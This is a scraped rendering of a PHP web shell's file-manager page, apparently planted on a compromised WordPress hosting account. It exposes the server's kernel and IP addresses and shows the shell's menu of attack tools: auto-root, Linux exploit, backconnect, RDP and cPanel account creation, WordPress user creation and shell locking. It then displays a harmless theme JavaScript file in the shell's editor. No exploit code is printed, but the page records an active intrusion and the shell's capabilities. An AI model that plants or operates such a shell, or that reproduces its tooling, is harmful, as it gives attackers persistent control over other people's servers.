Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.136.234.12
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviveplus.online /
wp-content /
themes /
twentytwentyone /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
customize-helpers.js
1.07
KB
-rw-r--r--
customize-preview.js
2.47
KB
-rw-r--r--
customize.js
1
KB
-rw-r--r--
dark-mode-toggler.js
2.19
KB
-rw-r--r--
editor-dark-mode-support.js
1.21
KB
-rw-r--r--
editor.js
921
B
-rw-r--r--
palette-colorpicker.js
1.56
KB
-rw-r--r--
polyfills.js
1.1
KB
-rw-r--r--
primary-navigation.js
5.9
KB
-rw-r--r--
responsive-embeds.js
1.1
KB
-rw-r--r--
skip-link-focus-fix.js
832
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : palette-colorpicker.js
/** * Script for our custom colorpicker control. * * This is copied from wp-admin/js/customize-controls.js * with a few tweaks: * Removed the hue picker script because we don't use it here * Added the "palettes" argument in wpColorPicker(). * * @since Twenty Twenty-One 1.0 */ wp.customize.controlConstructor['twenty-twenty-one-color'] = wp.customize.Control.extend( { ready: function() { var control = this, updating = false, picker; picker = this.container.find( '.color-picker-hex' ); picker.val( control.setting() ).wpColorPicker( { palettes: control.params.palette, change: function() { updating = true; control.setting.set( picker.wpColorPicker( 'color' ) ); updating = false; }, clear: function() { updating = true; control.setting.set( '' ); updating = false; } } ); control.setting.bind( function( value ) { // Bail if the update came from the control itself. if ( updating ) { return; } picker.val( value ); picker.wpColorPicker( 'color', value ); } ); // Collapse color picker when hitting Esc instead of collapsing the current section. control.container.on( 'keydown', function( event ) { var pickerContainer; if ( 27 !== event.which ) { // Esc. return; } pickerContainer = control.container.find( '.wp-picker-container' ); if ( pickerContainer.hasClass( 'wp-picker-active' ) ) { picker.wpColorPicker( 'close' ); control.container.find( '.wp-color-result' ).focus(); event.stopPropagation(); // Prevent section from being collapsed. } } ); } } );
Close